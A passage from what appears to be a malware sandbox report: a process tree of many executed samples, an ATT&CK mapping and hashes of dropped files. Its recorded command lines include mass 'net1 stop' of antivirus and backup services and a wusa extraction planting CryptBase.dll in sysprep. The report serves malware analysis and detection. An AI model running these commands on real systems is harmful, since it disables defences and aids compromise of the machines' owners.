  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a6ff8dfe654da70390cd71626cdca8a6f6a0d7980cd7d82269373737b04fd206.exe.exe"
  2⤵
  PID:7572
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a77c61e86bc69fdc909560bb7a0fa1dd61ee6c86afceb9ea17462a97e7114ab0.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a77c61e86bc69fdc909560bb7a0fa1dd61ee6c86afceb9ea17462a97e7114ab0.exe.exe"
  2⤵
  PID:8368
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a7c387b4929f51e38706d8b0f8641e032253b07bc2869a450dfa3df5663d7392.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a7c387b4929f51e38706d8b0f8641e032253b07bc2869a450dfa3df5663d7392.exe.exe"
  2⤵
  PID:4872
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a7e3ad8ea7edf1ca10b0e5b0d976675c3016e5933219f97e94900dea0d470abe.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a7e3ad8ea7edf1ca10b0e5b0d976675c3016e5933219f97e94900dea0d470abe.exe.exe"
  2⤵
  PID:7940
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.exe.exe"
  2⤵
  PID:7152
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a98099541168c7f36b107e24e9c80c9125fefb787ae720799b03bb4425aba1a9.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a98099541168c7f36b107e24e9c80c9125fefb787ae720799b03bb4425aba1a9.exe.exe"
  2⤵
  PID:7176
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c del /q "c:\RECYCLER\\waccess.tmp"
    3⤵
    PID:7472
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c del /q "c:\RECYCLER\\waccess.tmp"
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
    3⤵
    PID:6944
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\TMPH9G~1\A98099~1.EXE" -h
    3⤵
    PID:7312
  - - C:\Users\Admin\AppData\Local\Temp\TMPH9G~1\A98099~1.EXE
      C:\Users\Admin\AppData\Local\Temp\TMPH9G~1\A98099~1.EXE -h
      4⤵
      PID:8040
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c taskkill /f /PID 7176 && exit
    3⤵
    PID:3684
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\System32\cmd.exe /c taskkill /f /PID 7176 && exit
      4⤵
      PID:6872
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\AAA._xe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\AAA._xe.exe"
  2⤵
  PID:3956
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 548
    3⤵
    - Program crash
    PID:780
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\abba_-_happy_new_year_zaycev_net.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\abba_-_happy_new_year_zaycev_net.exe.exe"
  2⤵
  PID:5636
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\ad8965e531424cb34120bf0c1b4b98d4ab769bed534d9a36583364e9572332fa.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\ad8965e531424cb34120bf0c1b4b98d4ab769bed534d9a36583364e9572332fa.exe.exe"
  2⤵
  PID:6500
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a38df3ec8b9fe52a32860cf5756d2fe345badafd7e74466cd349eb32ba5cc339.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a38df3ec8b9fe52a32860cf5756d2fe345badafd7e74466cd349eb32ba5cc339.exe.exe"
  2⤵
  PID:9000
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\aed230b6b772aeb5c25e9336086e9dd4d6081d3efc205f9f9214b51f2f8c3655.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\aed230b6b772aeb5c25e9336086e9dd4d6081d3efc205f9f9214b51f2f8c3655.exe.exe"
  2⤵
  PID:6152
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\aedd0c47daa35f291e670e3feadaed11d9b8fe12c05982f16c909a57bf39ca35.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\aedd0c47daa35f291e670e3feadaed11d9b8fe12c05982f16c909a57bf39ca35.exe.exe"
  2⤵
  PID:6992
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\afa8d185de2f357082ed4042fc057a6d7300f603d3bfdbe7e6c351868e45e477.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\afa8d185de2f357082ed4042fc057a6d7300f603d3bfdbe7e6c351868e45e477.exe.exe"
  2⤵
  PID:8988
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 8988 -s 392
    3⤵
    - Program crash
    PID:6816
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a3667153a6322fb8d4cf8869c094a05e995e2954fda833fe14304837ed4fd0bd.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\a3667153a6322fb8d4cf8869c094a05e995e2954fda833fe14304837ed4fd0bd.exe.exe"
  2⤵
  PID:3348
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\agent.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\agent.exe.exe"
  2⤵
  PID:8356
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\Avatar_Rootkit_NETbotnet_32d6644c5ea66e390070d3dc3401e54b_unpacked.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\Avatar_Rootkit_NETbotnet_32d6644c5ea66e390070d3dc3401e54b_unpacked.exe.exe"
  2⤵
  PID:8360
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\b06ab1f3abf8262f32c3deab9d344d241e4203235043fe996cb499ed2fdf17c4.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\b06ab1f3abf8262f32c3deab9d344d241e4203235043fe996cb499ed2fdf17c4.exe.exe"
  2⤵
  PID:116
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\ArdamaxKeylogger_E33AF9E602CBB7AC3634C2608150DD18.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\ArdamaxKeylogger_E33AF9E602CBB7AC3634C2608150DD18.exe.exe"
  2⤵
  PID:8164
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Windows\system32\28463\DPBJ.exe"
    3⤵
    PID:5104
  - - C:\Windows\SysWOW64\28463\DPBJ.exe
      C:\Windows\system32\28463\DPBJ.exe
      4⤵
      PID:7496
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\9ccb4ed133be5c9c554027347ad8b722f0b4c3f14bfd947edfe75a015bf085e5.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\9ccb4ed133be5c9c554027347ad8b722f0b4c3f14bfd947edfe75a015bf085e5.exe.exe"
  2⤵
  PID:6012
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\9c17f267f79597ee01515f5ef925375d8a19844830cc46917a3d1b5bcb0ba4c3.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\9c17f267f79597ee01515f5ef925375d8a19844830cc46917a3d1b5bcb0ba4c3.exe.exe"
  2⤵
  PID:5080
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\b12c7d57507286bbbe36d7acf9b34c22c96606ffd904e3c23008399a4a50c047.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\b12c7d57507286bbbe36d7acf9b34c22c96606ffd904e3c23008399a4a50c047.exe.exe"
  2⤵
  PID:2120
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\B14299FD4D1CBFB4CC7486D978398214.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\B14299FD4D1CBFB4CC7486D978398214.exe.exe"
  2⤵
  PID:8664
- C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\b154ac015c0d1d6250032f63c749f9cf.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\b154ac015c0d1d6250032f63c749f9cf.exe.exe"
  2⤵
  PID:7228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2760 -ip 2760
1⤵
PID:1840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2744 -ip 2744
1⤵
PID:4600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3204 -ip 3204
1⤵
PID:696

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
1⤵
PID:5704
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 420
  2⤵
  - Program crash
  PID:6260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5704 -ip 5704
1⤵
PID:6628

C:\Users\Admin\AppData\Local\Temp\wovoletir.exe
C:\Users\Admin\AppData\Local\Temp\wovoletir.exe
1⤵
PID:6808

C:\Windows\system32\cmd.exe
/c wusa.exe C:\Users\Admin\AppData\Local\Temp\CryptBase.dll.cab /quiet /extract:C:\Windows\system32\sysprep\
1⤵
PID:5572
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop DefWatch /y
  2⤵
  PID:8144

C:\Users\Admin\AppData\Local\Temp\FlashUpdate.exe
C:\Users\Admin\AppData\Local\Temp\FlashUpdate.exe
1⤵
PID:4192

C:\Users\Public\Video\hrss.exe
C:\Users\Public\Video\hrss.exe
1⤵
PID:5928

C:\Windows\system32\wbem\scrcons.exe
C:\Windows\system32\wbem\scrcons.exe -Embedding
1⤵
PID:8032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c uninstall.bat
1⤵
PID:7588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
1⤵
PID:7564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
1⤵
PID:8328

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
1⤵
PID:8308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:8084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:8092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
1⤵
PID:4620

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:7460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:7820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:7568

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:8772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
1⤵
PID:7516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
1⤵
PID:7272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:7708

C:\Windows\system32\cmd.exe
/c wusa.exe C:\Users\Admin\AppData\Local\Temp\cryptbase.dll.cab /quiet /extract:C:\Windows\system32\sysprep\
1⤵
PID:6500

C:\PROGRA~2\ailiao\ailiao.exe
C:\PROGRA~2\ailiao\ailiao.exe
1⤵
PID:8668

C:\ProgramData\3101f8f780\gbudn.exe
C:\ProgramData\3101f8f780\gbudn.exe
1⤵
PID:8840

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\flash.exe"
1⤵
PID:4788

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8116

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7492

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\flash.exe"
1⤵
PID:7380

C:\Windows\system32\cmd.exe
/c wusa.exe C:\Users\Admin\AppData\Local\Temp\CryptBase.dll.cab /quiet /extract:C:\Windows\system32\sysprep\
1⤵
PID:8088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 3956 -ip 3956
1⤵
PID:8432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 8988 -ip 8988
1⤵
PID:6816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\ailiao\ailiao.exe

Filesize
1.8MB

MD5
52da7522527cc0eb0f648c94cf9ba178

SHA1
d6bc7063072facc9f656177557d76461797c5b7d

SHA256
f5cb4f1ad712e03a0381cf106a3c93c319aa14bc4ec4678afeee9ec03b576507

SHA512
578b9ec45372eafb0d5a4d54e81300c6581d3eaea364b04d12eafd74ec54c46c7c62e999b8caca19f67ec265053941c0ce505675fd897e701e42e43dff706a1c

Download Submit
C:\Program Files (x86)\ailiao\uninst.exe

Filesize
206KB

MD5
792cdda08614df2d91c9b45d83b633b3

SHA1
a8269696605247b5865dbdfcbba98ee9123e97c1

SHA256
d40e1d77a0ff3c8b1b65c4ec6d9b16c30cf70b10f9567bc4ee710248614bb859

SHA512
73100242482a160c54d7aece9089c617bb8d516f697461d13216b7dce259f26c3822921198932e589a8c6112b06b09d8514be51ae72bee26ef58d4bfd20eb4a5

Download Submit
C:\Program Files\Microsoft Updates\required.glo

Filesize
131B

MD5
2debfff543f6a86da9fc0ffa82466bda

SHA1
62fe02ac3baea5c046e2865b851d1e683cba64fb

SHA256
5de8d2d019ad029c6f3b9f5eec5e72bbe1a7bd87e2af3b961c727503e98740da

SHA512
f6d43437c1bd9c3255851a8765200d52cdddf1448c5b0aa2b9e00f931b4d34a02643944515e7a3a582bf9fc9d88ede2007c64dcae1c8162b8669e1a766cbbbe4

Download Submit
C:\Program Files\Microsoft Updates\torunzip.exe

Filesize
20KB

MD5
f2a5bea9843cfd088c062685be32154f

SHA1
10ca494259e42812e1495d96902285838bc4657f

SHA256
23eeb35780faf868a7b17b8e8da364d71bae0e46c1ababddddddecbdbd2c2c64

SHA512
36880f9d53a2e4a046d0134f1f8ad81d39f6ca76709580470f047455a80203fd3eb4317ce0e8ac1e174c20dd1ce1a41ef54f8b258adcdb24ed119b5014016a26

Download Submit
C:\ProgramData\3101f8f780\gbudn.exe

Filesize
178KB

MD5
2a3b92f6180367306d750e59c9b6446b

SHA1
95fb90137086c731b84db0a1ce3f0d74d6931534

SHA256
18fd6b193be1d5416a3188f5d9e4047cca719fa067d7d0169cf2df5c7fed54c0

SHA512
c87cda81a0133db40be68e0dd94e39f986f3a32faa54d4a1420e071407c94fffdfef6d6ec8f3fdb893115d84ae12824436cf5785fdb2c77dafb96be858b3b5d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft Help\Secure\Admin.tp.dat

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\59b03bec-293b-457a-be99-902b2c1cfb89.tmp

Filesize
10KB

MD5
f47c947a67fd15632f3937d00793fdf9

SHA1
5b3dce20b2d48b5e59ac98ced3b7c50e40212a6d

SHA256
f7ffa8a7e4a2cddccd064a10b3d4fd2f34c9054eb0c8e51e1671c32f2ad4b430

SHA512
3c61539228944979e8191cb4354767daf68126d589f39e789489f2dfc4afd42139fd10a3277a781d9f092dc71d56a8273a7aa7cc5c89a33dd6fe7510c2ac10dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f4787679d96bf7263d9a34ce31dea7e4

SHA1
ebbade52b0a07d888ae0221ad89081902e6e7f1b

SHA256
bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87

SHA512
de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
02d1081660aba15306a7ef9cf9487aef

SHA1
c31a343f04601832167e4a051d437282ec12abdf

SHA256
b1aa926ddb984a1253efea145ef5cc378ff1e13b6fde49a64b9f47cb0fb1b113

SHA512
7080778dd00d01f14912303ef8c20a6d316cdb3ca4d766f526714791244276c4df433742bdf0c65812cc7f52f56d3bf03c0118023615ddb3ce07ada54bd8b9d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
259dfe8e6c97feb2eaebc084f53dd0b8

SHA1
8f5a844c38ac77727ab5cda6c8380abd22402e5e

SHA256
6b510181be80f5121a0bf342aa2ce47931cda820c6679ee117a3a127aad49a82

SHA512
fb03731efca6ef5f97c179af59d9aa8f11a37c90ee1235644c23ae2feee1db6bb7ae3453f8d8d263c7d76ffb833e683ffb49cb71d8902f9db547366f121a3a6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
3a748249c8b0e04e77ad0d6723e564ff

SHA1
5c4cc0e5453c13ffc91f259ccb36acfb3d3fa729

SHA256
f98f5543c33c0b85b191bb85718ee7845982275130da1f09e904d220f1c6ceed

SHA512
53254db3efd9c075e4f24a915e0963563ce4df26d4771925199a605cd111ae5025a65f778b4d4ed8a9b3e83b558066cd314f37b84115d4d24c58207760174af2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
22c703ad9b8b53dc1cc1327b18b3f9ec

SHA1
596749a35de06d26fcc493bcf8fab1ef2358d4a6

SHA256
43530dcaa4bad87b99e91446383699296ca0eb538869df80178270d457ae55a2

SHA512
ec95e1b55d286e8a244b628d464b9a4807357306bbb795515b47e552f2ee95eb8b67c07292bc4051cd80e9ae4e747f8f94ef9d67128df2c1c08fffd3d3dedce5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FG4P7PGK\questd[1].htm

Filesize
175B

MD5
00b1749e7f34b8de5bde2b4abd5cefef

SHA1
da5846fe6898511ed9dcf79f12d78042fb649e01

SHA256
b5aa18241aa2adbec8f48b308a46a386e31040f6bb85ca381e427b399679b56e

SHA512
6f67d4b248aaef21240086783c929554093b643f039d2aa5855d83c32060e2cff8d3c7389d308f151538bff2f8e31d7f10b0b25c3c63c35712886967afbe2b80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\wininet.exe

Filesize
416KB

MD5
034e4c62965f8d5dd5d5a2ce34a53ba9

SHA1
edc165e7e833a5e5345f675467398fb38cf6c16f

SHA256
52cb02da0462fdd08d537b2c949e2e252f7a7a88354d596e9f5c9f1498d1c68f

SHA512
c2de626a339d21e5fd287c0e625bca02c770e09f9cad01005160d473164fa8edc5fc381b6ddd01293bdd31f2d7de1b0171674d12ec428e42a97d0ed0b7efb9dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\winsec.dll

Filesize
104KB

MD5
5b505d0286378efcca4df38ed4a26c90

SHA1
008bb270dbdccc8da97baf49c9d091a38aba6ff1

SHA256
bd039bb73f297062ab65f695dd6defafd146f6f233c451e5ac967a720b41fc14

SHA512
f103b0e89839ee9e4aec751ae086fd6dde770497e7727b349f4ea7b6ea4671f7a495414877bbab20b3a497ba6be1d834da201f20a223e7cd552bf7426d8b4067

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\01259a104a0199b794b0c61fcfc657eb766b2caeae68d5c6b164a53a97874257.exe.exe

Filesize
24KB

MD5
460b288a581cdeb5f831d102cb6d198b

SHA1
a2614a8ffd58857822396a2740cf70a8424c5c3e

SHA256
01259a104a0199b794b0c61fcfc657eb766b2caeae68d5c6b164a53a97874257

SHA512
168a0d21a05c59e28eb9af2c0a78bf438ed15305fce9a876c2feeed77efef863e63ce4392fdaf0ce89ff8529f69eee906912e5300bc9bb8c772e7da743ea832e

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\01259a104a0199b794b0c61fcfc657eb766b2caeae68d5c6b164a53a97874257.exe.exe

Filesize
24KB

MD5
460b288a581cdeb5f831d102cb6d198b

SHA1
a2614a8ffd58857822396a2740cf70a8424c5c3e

SHA256
01259a104a0199b794b0c61fcfc657eb766b2caeae68d5c6b164a53a97874257

SHA512
168a0d21a05c59e28eb9af2c0a78bf438ed15305fce9a876c2feeed77efef863e63ce4392fdaf0ce89ff8529f69eee906912e5300bc9bb8c772e7da743ea832e

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe.exe

Filesize
5.4MB

MD5
d7d6889bfa96724f7b3f951bc06e8c02

SHA1
a897f6fb6fff70c71b224caea80846bcd264cf1e

SHA256
0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e

SHA512
0aabb090791d8b7c5af273793d61bc7ef164343d027e12b58faec66dbdddb724f58b267a423088ce06c52420af80ffe276b448cd3844fee4f929a98b0f64ae75

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e.exe.exe

Filesize
5.4MB

MD5
d7d6889bfa96724f7b3f951bc06e8c02

SHA1
a897f6fb6fff70c71b224caea80846bcd264cf1e

SHA256
0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e

SHA512
0aabb090791d8b7c5af273793d61bc7ef164343d027e12b58faec66dbdddb724f58b267a423088ce06c52420af80ffe276b448cd3844fee4f929a98b0f64ae75

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\03641e5632673615f23b2a8325d7355c4499a40f47b6ae094606a73c56e24ad0.exe.exe

Filesize
596KB

MD5
2b9106e8df3aa98c3654a4e0733d83e7

SHA1
db5b0f6256a2e68acffd14c4946971e2e9e90bfb

SHA256
03641e5632673615f23b2a8325d7355c4499a40f47b6ae094606a73c56e24ad0

SHA512
3047ab7bd9e34973403a4dfdff133016deeea97b37b111f00156b2e26de9c0c0ed8bffea4f8ce5cb46779d52a7e1124c38e503e832bc7e62705889b6df54a011

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\03641e5632673615f23b2a8325d7355c4499a40f47b6ae094606a73c56e24ad0.exe.exe

Filesize
596KB

MD5
2b9106e8df3aa98c3654a4e0733d83e7

SHA1
db5b0f6256a2e68acffd14c4946971e2e9e90bfb

SHA256
03641e5632673615f23b2a8325d7355c4499a40f47b6ae094606a73c56e24ad0

SHA512
3047ab7bd9e34973403a4dfdff133016deeea97b37b111f00156b2e26de9c0c0ed8bffea4f8ce5cb46779d52a7e1124c38e503e832bc7e62705889b6df54a011

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\03641e5632673615f23b2a8325d7355c4499a40f47b6ae094606a73c56e24ad0.exe.exe

Filesize
596KB

MD5
2b9106e8df3aa98c3654a4e0733d83e7

SHA1
db5b0f6256a2e68acffd14c4946971e2e9e90bfb

SHA256
03641e5632673615f23b2a8325d7355c4499a40f47b6ae094606a73c56e24ad0

SHA512
3047ab7bd9e34973403a4dfdff133016deeea97b37b111f00156b2e26de9c0c0ed8bffea4f8ce5cb46779d52a7e1124c38e503e832bc7e62705889b6df54a011

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe.exe

Filesize
370KB

MD5
2aea3b217e6a3d08ef684594192cafc8

SHA1
3a0b855dd052b2cdc6453f6cbdb858c7b55762b0

SHA256
0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab

SHA512
ea83fcb7465e48445f2213028713c4048ac575b9c2f7458a014c495bddb280be553a22b1056284efad7dd55c2a7837096755206581c67bb0183e4ac42160011a

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe.exe

Filesize
370KB

MD5
2aea3b217e6a3d08ef684594192cafc8

SHA1
3a0b855dd052b2cdc6453f6cbdb858c7b55762b0

SHA256
0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab

SHA512
ea83fcb7465e48445f2213028713c4048ac575b9c2f7458a014c495bddb280be553a22b1056284efad7dd55c2a7837096755206581c67bb0183e4ac42160011a

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0468127a19daf4c7bc41015c5640fe1f.exe.exe

Filesize
121KB

MD5
0468127a19daf4c7bc41015c5640fe1f

SHA1
133877dd043578a2e9cbe1a4bf60259894288afa

SHA256
dd1792bcdf560ebaa633f72de4037e78fe1ada5c8694b9d4879554aedc323ac9

SHA512
39cec4cdc9e2b02923513a3f1bc3ac086b0598df77c7029493a810dfbe40c946fa62905d1dcb80aba87c9e74677aac893108faa94e027c261aff7d388bbdcdfc

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\0468127a19daf4c7bc41015c5640fe1f.exe.exe

Filesize
121KB

MD5
0468127a19daf4c7bc41015c5640fe1f

SHA1
133877dd043578a2e9cbe1a4bf60259894288afa

SHA256
dd1792bcdf560ebaa633f72de4037e78fe1ada5c8694b9d4879554aedc323ac9

SHA512
39cec4cdc9e2b02923513a3f1bc3ac086b0598df77c7029493a810dfbe40c946fa62905d1dcb80aba87c9e74677aac893108faa94e027c261aff7d388bbdcdfc

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\05455efecab4a7931fa53a3c2008d04fc6b539c5e8f451f19b617bd9b3ebcd83.exe.exe

Filesize
56KB

MD5
1b83b315b7a729cb685270496ae68802

SHA1
8d8d24b25d9102d620038440ce0998e7fc8d0331

SHA256
05455efecab4a7931fa53a3c2008d04fc6b539c5e8f451f19b617bd9b3ebcd83

SHA512
cb584f3a97f7cb8062ab37665030161787f99eeff5ba1c8f376d851fd0824a5b2b3b3fef62e821030e7dcb1b3d6ca4a550f5571498066e27c1aa5022eb1d72f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\05455efecab4a7931fa53a3c2008d04fc6b539c5e8f451f19b617bd9b3ebcd83.exe.exe

Filesize
56KB

MD5
1b83b315b7a729cb685270496ae68802

SHA1
8d8d24b25d9102d620038440ce0998e7fc8d0331

SHA256
05455efecab4a7931fa53a3c2008d04fc6b539c5e8f451f19b617bd9b3ebcd83

SHA512
cb584f3a97f7cb8062ab37665030161787f99eeff5ba1c8f376d851fd0824a5b2b3b3fef62e821030e7dcb1b3d6ca4a550f5571498066e27c1aa5022eb1d72f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\.tmpH9GGj2\07529fae9e74be81fd302d022603d9f0796b4b9120b0d6131f75d41b979bbca5.exe.exe

Filesize
384KB

MD5
61b11b9e6baae4f764722a808119ed0c

SHA1
29362d7c25fbb894b3ac9675b4e7770682196755

SHA256
